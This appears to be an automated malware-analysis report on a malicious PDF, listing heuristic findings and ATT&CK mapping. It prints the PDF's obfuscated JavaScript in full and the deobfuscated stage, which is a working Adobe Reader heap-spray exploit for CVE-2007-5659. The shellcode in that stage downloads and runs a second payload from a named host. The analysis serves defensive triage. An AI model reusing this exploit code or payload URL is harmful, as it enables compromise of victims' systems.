Verdict: MALICIOUS (Risk Score 308)

Malware Insights

MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious code. The extracted JavaScript object, javascript_obj0013_001.js, also shows signs of obfuscation. The primary intent appears to be the execution of this script, likely to download and execute a secondary payload, which is a common delivery mechanism for malware. No specific family could be identified due to the obfuscation.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)

- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low; 3 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  The matched line is the opening `function DBH4ncjcU(){eval(...)` line of javascript_obj0013_001.js, reproduced in full under Extracted artifacts.
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://abb192.cn/exp/load.php?id=1518&spl=4 (referenced by PDF JavaScript).
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x367 | 6469 bytes | a6d8eaa07e1c4360fd0b98c53edb2e1294126394db01105c8489cf616ddb6f56 |

Detection: ClamAV: No threats found. Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s); 144 of 214 identifiers look randomly generated (e.g. 'vXcwJXcP5XcPWXBah5TRT9NcdsxzF8GwYi'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script; the carved file is a single line, reproduced unchanged):

```javascript
function DBH4ncjcU(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function gMpH1nBIDz(WNePXUumO){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(WNePXUumO)"+";"+"}");eval("function t6yyykopTZ8q(f0oXPs){var dTRJqmbr="+"0,XGcURm6Aj28S87=f0oXPs.l"+"en"+"gth,qqFvJ=10"+"2"+"4,aAgCK,ZjOLhexC7kHG,hOxQUOWK='',XeTUp0h0e=dTRJqmbr,Y3nahlmnW551N=dTRJqmbr,vowMKH2mvUGkdy=dTRJqmbr,zPnKDN2=Ar"+"ra"+"y(63,46,53,61,51,2,50,32,22,26,0,0,0,0,0,0,31,36,13,23,24,29,58,57,25,20,6,55,1,27,10,47,48,12,52,16,40,38,45,9,11,28,5,0,0,0,0,42,0,33,17,44,4,8,7,59,19,54,3,49,56,35,62,14,30,60,0,39,21,15,18,34,41,43,37);f"+"o"+"r(ZjOLhexC7kHG=M"+"at"+"h.c"+"ei"+"l(XGcURm6Aj28S87/"+"qqFvJ)"+";ZjOLhexC7kHG>dTRJqmbr;ZjOLhexC7kHG-"+"-){fo"+"r(aAgCK=Ma"+"th.m"+"in(XGcURm6Aj28S87,qqFvJ);aAgCK>dTRJqmbr;aAgCK-"+"-,XGcURm6Aj28S87-"+"-){vowMKH2mvUGkdy|"+"=(zPnKDN2[f0oXPs.cha"+"rCod"+"eAt(XeTUp0h0e+"+"+)-48])<"+"<Y3nahlmnW551N;if(Y3nahlmnW551N){hOxQUOWK+"+"=gMpH1nBIDz"+"(242^vowMKH2mvUGkdy&"+"2"+"5"+"5);vowMKH2mvUGkdy>"+">="+"8;Y3nahlmnW551N-"+"="+"2;}el"+"se{Y3nahlmnW551N="+"6"+";}}"+"}return (hOxQUOWK);}var gpUEuV=implode('',['v','hlArNBU','kpFcmUxzv0cRY','pH','avu','X7','roGw','9OE6v','hGaYJxaM','iWs','vXe__Uy6h','nyi','Jw','HPfy','exRvX_Lg','VR2pGO08','l_j','1VRW','NEa91','xsCNViJw','HPfyexRv','X','_L4VsC6HzJ_WirgY','VCngOZ1F7Ms','TaDJqkNvN','VRw','9Pvs','34','vMeU','L@cw','A','vX','V','TJY6uNVaDJ','qkNv','N','VRw9Pv0cRJwHPfyexRv','X','_L','4E7f','5H7J5','lUY8','xi5gEVCn','gO','Z1F7E','jqiWXB7C9lar6','xRJwHPfyex','Rv','X_L','sc','RuN','Bz','f6H','AJ1HsYNEOSFW','zrUMcP5','F','sy','pM','1F_','3ivsTRd','oW7vfNVYpG','x0_GOC','N3','4vXcw5fxPbNYA5f','H6vhlArNEVrmy1','ro9Va','5XaGv','_RuX3aY','pH7','box7C_BRC@','TkLMYPC@TkLMYP','C@TkL','MYPC@TPRpX','cC','@DPL@Q','c','C@ekdfg6C@T6','5','jg','6','C@','T65X','qPC','@lVRJYPC','@lV','r','M','YP','C@lVPvgcC@lVNXqkC@eV','RpMcC@eVR','v','XVC@','T','6','P8Q','VC@TVR9','qVC@','l','VRpXV','C@ekJ@XVC@l','VLuX','VC@l6R','v','ck','C@TkrhMPC@l6RvckC@ekKpMkC','@','lVRNYPC@lVRpXcC','@ek','J@','XVC@e','cX','XY','PC@','ekjyYk','C@lVj','ug','PC','@TP','ZXYPC@','lVR','oqPC@lVRpXVC@lc4v','QkC@ecX','@X','cC@DkZyY','kC@ek','f','uqPC@TPZ@gPC@','lV','RoQV','C@l','V','RpXVC@l','c4vQkC@ecX@','MkC@Dc4_YkC','@lP5@QVC@TPZjcVC@','lVRN','cVC@l','VRpXVC','@lc4v','QkC','@ecX','@MP','C@','TP5yYkC@TPR5','qPC@T','PZyQV','C@lVRJQcC','@l','VRpX','V','C@lc4v','QkC@ecXhXVC@ePK_YkC@TP41Q','kC@TPZ','@YkC@lVR5q6C@lVRpXVC@','lc4vQ','k','C@lcRvXc','C@TV','ZhQVC@l645YcC@ekdu','qkC@eVZugc','C@lVNXQk','C@lVRpgVC@ecj','@X','VC@l64vQkC@ek','J','f','XcC@lVP','ogc','C','@lVK_qkC@ek','J','jX','k','C@','eV','Zjgc','C','@TPZ','jg6C@lVR','vc','kC@lVRp','XVC@T6Z','jXVC@e','VfMg6','C@','l6RJyPC@DkNXYkC@lV','RpXVC@ekd@XVC@eVLugcC@eP4v','ckC','@ePRvYcC@ekdjXVC@Dc','RogcC@lP5','y','YkC@lVR','pXVC@','ecRp','XVC','@lc4vckC@T','6fhX','cC@ecd@yVC@ec4vc','kC@','TPZhMkC@lVR_q','VC@','lV','Rp','XVC@lc4pMc','C@ePNfX','VC@ecL@XV','C@','DcjOq','P','C@ePNyqcC@lVP','oXVC','@T641YkC','@l','VRpXVC@','l64oc','PC@','ekJfXVC@lV','Lugc','C@lVK_','qk','C@ekJjXkC@eVZjgcC@lcR','NYkC@lVRp','XVC@T','6f@XVC@e','cZ@y6C@','lc4pMcC@TVkJXc','C@eckJckC@lP5jMcC@','DcR1','qcC@eck5XV','C@lc4vckC@T6f','h','MPC@ecd@gcC@ec4vckC@TP','ZhM','kC@l','V','RJ','McC@l','VR','pXVC@lVR_q','kC@l','64ocPC','@ekJ','fXVC@lVZugcC@lVi','_qkC@ekJ','jXkC@eV','ZjgcC@e','VRNYkC','@lVRpX','VC@','T6','f','@XV','C@ekJucPC@eVRogcC','@l','V','K_qkC@ekJjXkC','@eVZj','g','cC','@lVR','NYkC@lVR','pXVC@','lcKpXVC@ec','i','5ykC@T','PKpMcC@','TPKpMcC','@TPK','pM','cC@T','PKpMcC@TPLhYcC@ecf@XcC@','ekJ','j','Mc','C','@TPi','JqkC@','e','cioc6C@T','P','RocP','C','@ekJjgcC@ekJXYPC@lVZOQPC','@','ecrhckC@ec','X@MPC@l6k','vckC','@ekJMMPC@eVjO','Q','cC@','lVk1YkC@e','cXu','YcC@l6','XhckC@lVk','JXVC','@T','Vko','YcC','@lcdjQkC','@Tkru','g','VC@ePk','pMcC@TVk5g6C@lV5uq6','C@eVRpqP','C@lP','i','9gkC@l','VZOQ','cC@e','PjjqVC@l','VkpXPC@lc','R','ocV','C@','lPKNckC@lPjMykC@','l645gPC','@ecfXqcC','@TP','JhckC@ecfhckC','@lV','kJ','X','cC@T','6XfQPC','@lVLhckC@ekJuykC@e','VLjgkC@DP','r@McC@lV','PvckC@lV','kvckC@','e','cjj','qcC@eP','i5XPC@lV','Rp','MkC@l','PPNYkC@lP5u','qPC','@e','c4ocPC@lcLjyV','C@l','c5','u','XPC@lV','R','ogPC@DkJhc6C','@Dk','5CckC','@ePRJqcC@ek','jjQVC@','ekrhQPC@D','PXfqPC@ePKJQ','PC@e','kKvYPC','@ekfjQ','VC@Dk5Cc6C@ekk5QVC@ekjhQVC@ePKvc','kC@e','kNCc','PC@D','PR','8cPC','@ekJ','hq6C@D','PjfcVC@DPjfqkC@e','Pdf','c6C@Dk5CYPC@D','PivYcC@','TP5f','c','k','SOE6vhlA','rN3','TZMG','PU1g','OkN3','4vXcwJXcP5XcPWXBah5TRT9NcdsxzF8GwYi','xRuXEVrmy1ro9Va','5','X','aGvN','KppW','st9TUvmVRrscRdoW','7','vCgz0nMa','yoTRuX3T','ZMG','PU1gOkN3Kvy','B_U5X','k','H9x1t1esEUVPN','Jc','6MscRdoW7vMe','UL@cwA','v','XV','TJc','R','u','X3aY','p','H','7b','ox7C_B','RC@l65OcPC@l','65OcPSOE6','vMe','UL@cwAvXVTJ','cRuXV7T','_91','NuGO9','Me','UL@cw','A','vX','VTJcK','vCgz0','n','MayoliWXBah5TRU','wW_N','1e','a79x_D8lz','v0cR9fNVYpG','x0','_G','OCN3K','vX','cwJ','X','cP','5XcPMK','3TZMGPU1','gOk','Uc','R','IiW7vyBah','5T','R','3_laffXV0pFz','Sn','cP','WK','ywfpYcRng','xC5x','4U','wW_','N1ea79x_D8l','z','WKywfpYcRngxC5HiHOVRW','N','B','UkpFcmUx','zxi','ywfpYcRngx','C5Gyv0cRJwHPfyexRvX_LXEivCXPl_X7','m8M','TP','vD1AUcRuN','3mvhGaYJ','x','aMiWsv4x6C1','X1X1e','s','5','@c_YF','yV','9OVRWN','B','ah5T','RLJ','YVJFx','7v0c','R','hNT7Yhl','UC8','l','zrvFzrJ','lUE6','WK','JiH','TJ5lUY8xiMsc','R','L','JYVJFx7v0cRLJYV','JFx7Yjl','z5FGAbp','xiEg_VECxKSj3','i','WXBah5TRbUG','101','XPl8DORp','ckv0cRYpHavu','X7ro','Gw9fDP29T','s56EA9oW749T','i5','OVKL','JYV','J','Fx7','YfxUh5','l','c','J_3','PMgE7LCyapNeKb','_GAroya9jqi','MscRM','vxR9yE','AH1gOg5Q1','Zi','XVfMY_50_','Ru0cRN','X','B2','IXV','i9f','H','Ugn','g1rmMa3vgkJ','s','FPON34uX3PvhB2','vfHUgng1','rmM','a3vgkJsNPO','NV4vjqivgTmv','fHUgng','1rmMa3vgkJsFPON','V4vuqiMXVm','oNVibU','G','101XPl8DORpck','xNqy','v0q4vCcRI','hVRbU','G101XPl8DORpc','kx','o','qyv','gcRjOV','R','oF','TR9fHU','g','ng1r','mMa3v','gkJs_PONV4vCqiMXEw','vK','XApv','W7GJXc7nG','_KUy19OE6vhlArNEarCF','c4oGUNN34v@','esCJDA','hNlz9','j32f','NYA5','fG2','fNYA5fWRMscRZ_G','U','ppxi','Z5Y','x4ogA','M_eKpp','W','st9TUv','gcRJMq6f','jqi','v','CeP','zogch','1xwvs','34','vC','e','P','z','o','gch1xwWXVa','91H7YfHspFGASJ_','aE5lz','v0','c','R','k','ixspoWAYf','Hsp','F','Gzb9l','V@oG','Up1','XsIi','x','iWJlaSwW6vjBRp0H','7twcRZ5','Yx','4og','AM_lmMscRuN','3mv4x6C1X1X1es5@c_','YFyV','9OE6']);");eval(t6yyykopTZ8q(gpUEuV));}
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x367 | 2592 bytes | ee1fa0934f44e55fea7bd193e28245286d0600f518f4e8f8a0056bd2c290cb64 |

Detection: ClamAV: No threats found. Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script; the recovered stage is a single line, reproduced unchanged):

```javascript
var jCUAQkd = new Array(); function pZXK8aM(tj35xVFFZ3, GeMMwYq) { while (tj35xVFFZ3.length*2<GeMMwYq){tj35xVFFZ3 += tj35xVFFZ3;} tj35xVFFZ3 = tj35xVFFZ3.substring(0,GeMMwYq/2); return tj35xVFFZ3; } function OblfrKCBRmYEKH() { var SFneUMhMe = 0x0c0c0c0c; var G2JHrQGSBvKV = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u313D%u3135%u2638%u7073%u3D6C%u0034"); var Q7d1TIMC = 0x400000; var ZTB6kdHgyno = G2JHrQGSBvKV.length * 2; var GeMMwYq = Q7d1TIMC - (ZTB6kdHgyno+0x38); var tj35xVFFZ3 = unescape("%u9090%u9090"); tj35xVFFZ3 = pZXK8aM(tj35xVFFZ3, GeMMwYq); var TjZxyvRdXjwe = (SFneUMhMe - 0x400000)/Q7d1TIMC; for (var Oxu5CFMUeb=0;Oxu5CFMUeb<TjZxyvRdXjwe;Oxu5CFMUeb++) { jCUAQkd[Oxu5CFMUeb] = tj35xVFFZ3 + G2JHrQGSBvKV; } } function n8eIJyyn05XnLD() { var s3Gtlp = app.viewerVersion.toString(); s3Gtlp = s3Gtlp.replace(/\D/g,""); var ckIMI2JwOF54 = new Array(s3Gtlp.charAt(0),s3Gtlp.charAt(1),s3Gtlp.charAt(2)); if ((ckIMI2JwOF54[0] == 8 && ((ckIMI2JwOF54[1] == 1 && ckIMI2JwOF54[2] < 2) || ckIMI2JwOF54[1] < 1)) || (ckIMI2JwOF54[0] == 7 && ckIMI2JwOF54[1] < 1) || (ckIMI2JwOF54[0] < 7)) { OblfrKCBRmYEKH(); var w2WAAaix = unescape("%u0c0c%u0c0c"); while(w2WAAaix.length < 44952) w2WAAaix += w2WAAaix; this.collabStore = Collab.collectEmailInfo({subj: "",msg: w2WAAaix}); } } n8eIJyyn05XnLD();
```